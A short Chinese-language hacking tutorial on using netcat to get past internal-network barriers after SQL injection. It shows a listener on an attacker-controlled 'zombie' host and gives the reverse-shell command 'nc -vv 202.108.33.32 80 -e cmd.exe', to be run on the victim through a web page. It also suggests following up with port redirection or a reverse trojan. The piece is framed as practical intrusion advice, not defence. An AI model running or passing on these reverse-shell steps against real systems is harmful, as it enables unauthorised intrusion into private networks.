1、SQL注入内网渗透的一种思路
2、nc命令的一种好用法
内网渗透对于网络安全爱好者,特别是网络入侵检测时无疑是一种疼,很多时候我们遇到这种情况只有采取放弃,其实不然,完全使用另外一种方法来进行突破。很多人多知道nc号称瑞士军刀,是一款非常不错的网络安全工具,其强大的功能毫不逊于一款远程控制软件,只是我们没有挖掘其强大的功能而已。本文只是探讨如何来进行内网突破的思维。下面讲讲本文对nc的具体用法。
(一)在控制端监听端口
这个控制端可以是自己的肉鸡,可以是在具有独立IP的网络计算机上,一定要具有独立IP,否则无法反弹到该IP地址。使用命令如下:
Nc –vv –l –p port 例如 nc –vv –l –p 80
在控制端监听端口时,需要注意的是,需要先使用“netstat -an”查看网络端口的开放情况,选择一个未监听的端口,一般选择80,443,446,110,25,23端口为好,当然其他未用端口也可以。
说明:如果控制端已经开放了我们要监听的端口,那么我们使用nc监听该端口不会成功,nc程序会提示错误信息,如果监听正常,会显示“Listening on [any] 80 …….”字样。
(二)在内网计算机开放端口
在内网计算机上运行“nc –vv ipaddress port –e cmd.exe”,这里的IPaddress一定是控制端的ip地址,例如控制端的地址为“202.108.33.32”,且80端口未开放,则在内网计算机上运行“nc –vv -202.108.33.32 80 –e cmd.exe”即可。如果一切正常,则会反弹一个dosshell回来,跟cmd命令的运行界面差不多,就象在本机的DOS下操作一样,非常好用,可以粘贴命令,直接执行命令等。使用“net user”命令,可以看到我的账号“simeon”在其中。
(三)其它运用
本文介绍的是如何使用nc来反弹内网的shell,在sql注入的过程中,很多时候遇到独立主机是内网IP,及时主机开放了3389也无法连接进去,这个时候,一个真正的dosshell就特别重要,通过网页执行nc命令,提供该内网一个shell,然后执行lcx端口重定向或者执行反弹木马或者其他命令,无疑是一个很好的解决方法。
(四)结束语
本文就技术难度来说,并不是很大,nc这个软件很多朋友都熟悉,可以这么说,搞网络安全的没有不熟悉nc这个软件的,但是对于nc命令的很多用法,不一定熟悉。想不起来曾经看过的一部电影,其中有这么一段话,高手就是将一个复杂的动作做到单一和简单!这跟真正的武林高手一样,不一定需要太多招式,一刀一剑就可以致命取胜。网络安全也是如此,对一个工具要熟能生巧,举一反三,才能出现更多的用法,更多的新的idea,期待大家新的发现。